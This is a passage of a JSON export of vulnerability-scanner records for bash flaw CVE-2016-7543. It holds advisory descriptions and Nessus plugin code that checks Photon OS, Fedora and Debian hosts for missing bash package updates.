"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Bash PHSA-2017-0009 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:bash", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0009.NASL", "href": "https://www.tenable.com/plugins/nessus/111858", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0009. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111858);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\"CVE-2016-7543\");\n\n script_name(english:\"Photon OS 1.0: Bash PHSA-2017-0009 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [bash] packages for PhotonOS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-33\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7035e730\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7543\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"bash-4.3.30-8.ph1\",\n \"bash-debuginfo-4.3.30-8.ph1\",\n \"bash-lang-4.3.30-8.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:28:45", "description": "An update of the bash package has been released.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Bash PHSA-2017-0009", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:bash", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0009_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/121675", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0009. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121675);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2016-7543\");\n\n script_name(english:\"Photon OS 1.0: Bash PHSA-2017-0009\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the bash package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-33.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-4.3.30-8.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-debuginfo-4.3.30-8.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-lang-4.3.30-8.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:40:10", "description": "Specially crafted SHELLOPTS and PS4 variables can cause arbitrary code execution. It is a security bug described in CVE-2016-7543 and this update fixes it.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-06T00:00:00", "type": "nessus", "title": "Fedora 24 : bash (2016-5a54fb4784)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-5A54FB4784.NASL", "href": "https://www.tenable.com/plugins/nessus/93882", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-5a54fb4784.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93882);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7543\");\n script_xref(name:\"FEDORA\", value:\"2016-5a54fb4784\");\n\n script_name(english:\"Fedora 24 : bash (2016-5a54fb4784)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted SHELLOPTS and PS4 variables can cause arbitrary code\nexecution. It is a security bug described in CVE-2016-7543 and this\nupdate fixes it.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-5a54fb4784\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"bash-4.3.42-7.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:40:11", "description": "Specially crafted SHELLOPTS and PS4 variables can cause arbitrary code execution. It is a security bug described in CVE-2016-7543 and this update fixes it.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-13T00:00:00", "type": "nessus", "title": "Fedora 23 : bash (2016-f15168439d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-F15168439D.NASL", "href": "https://www.tenable.com/plugins/nessus/94031", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-f15168439d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94031);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7543\");\n script_xref(name:\"FEDORA\", value:\"2016-f15168439d\");\n\n script_name(english:\"Fedora 23 : bash (2016-f15168439d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted SHELLOPTS and PS4 variables can cause arbitrary code\nexecution. It is a security bug described in CVE-2016-7543 and this\nupdate fixes it.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-f15168439d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"bash-4.3.42-5.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:39:37", "description": "This is a correction of DLA 680-1 that mentioned that bash 4.2+dfsg-0.1+deb7u3 was corrected. The corrected package version was 4.2+dfsg-0.1+deb7u4.\n\nFor completeness the text from DLA 680-1 available below with only corrected version information. No other changes.\n\nAn old attack vector has been corrected in bash (a sh-compatible command language interpreter).\n\nCVE-2016-7543 Specially crafted SHELLOPTS+PS4 environment variables in combination with insecure setuid binaries.\n\nThe setuid binary had to both use setuid() function call in combination with a system() or popen() function call. With this combination it is possible to gain root access.\n\nI addition bash have to be the default shell (/bin/sh have to point to bash) for the system to be vulnerable.\n\nThe default shell in Debian is dash and there are no known setuid binaries in Debian with the, above described, insecure combination.\n\nThere could however be local software with the, above described, insecure combination that could benefit from this correction.\n\nFor Debian 7 'Wheezy', this problem have been fixed in version 4.2+dfsg-0.1+deb7u4.\n\nWe recommend that you upgrade your bash packages.\n\nIf there are local software that have the insecure combination and do a setuid() to some other user than root, then the update will not correct that problem. That problem have to be addressed in the insecure setuid binary.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-27T00:00:00", "type": "nessus", "title": "Debian DLA-680-2 : bash version number correction", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "p-cpe:/a:debian:debian_linux:bash-builtins", "p-cpe:/a:debian:debian_linux:bash-doc", "p-cpe:/a:debian:debian_linux:bash-static", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-680.NASL", "href": "https://www.tenable.com/plugins/nessus/94294", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-680-2. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94294);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7543\");\n\n script_name(english:\"Debian DLA-680-2 : bash version number correction\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a correction of DLA 680-1 that mentioned that bash\n4.2+dfsg-0.1+deb7u3 was corrected. The corrected package version was\n4.2+dfsg-0.1+deb7u4.\n\nFor completeness the text from DLA 680-1 available below with only\ncorrected version information. No other changes.\n\nAn old attack vector has been corrected in bash (a sh-compatible\ncommand language interpreter).\n\nCVE-2016-7543 Specially crafted SHELLOPTS+PS4 environment variables in\ncombination with insecure setuid binaries.\n\nThe setuid binary had to both use setuid() function call in\ncombination with a system() or popen() function call. With this\ncombination it is possible to gain root access.\n\nI addition bash have to be the default shell (/bin/sh have to point to\nbash) for the system to be vulnerable.\n\nThe default shell in Debian is dash and there are no known setuid\nbinaries in Debian with the, above described, insecure combination.\n\nThere could however be local software with the, above described,\ninsecure combination that could benefit from this correction.\n\nFor Debian 7 'Wheezy', this problem have been fixed in version\n4.2+dfsg-0.1+deb7u4.\n\nWe recommend that you upgrade your bash packages.\n\nIf there are local software that have the insecure combination and do\na setuid() to some other user than root, then the update will not\ncorrect that problem. That problem have to be addressed in the\ninsecure setuid binary.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/10/msg00045.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bash\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-builtins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bash\", reference:\"4.2+dfsg-0.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-builtins\", reference:\"4.2+dfsg-0.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-doc\", reference:\"4.2+dfsg-0.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-static\", reference:\"4.2+dfsg-0.1+deb7u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:39:38", "description": "Specially crafted SHELLOPTS and PS4 variables can cause arbitrary code execution. It is a security bug described in CVE-2016-7543 and this update fixes it.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-15T00:00:00", "type": "nessus", "title": "Fedora 25 : bash (2016-2c4b5ad64e)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-2C4B5AD64E.NASL", "href": "https://www.tenable.com/plugins/nessus/94785", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-2c4b5ad64e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94785);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7543\");\n script_xref(name:\"FEDORA\", value:\"2016-2c4b5ad64e\");\n\n script_name(english:\"Fedora 25 : bash (2016-2c4b5ad64e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted SHELLOPTS and PS4 variables can cause arbitrary code\nexecution. It is a security bug described in CVE-2016-7543 and this\nupdate fixes it.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-2c4b5ad64e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) 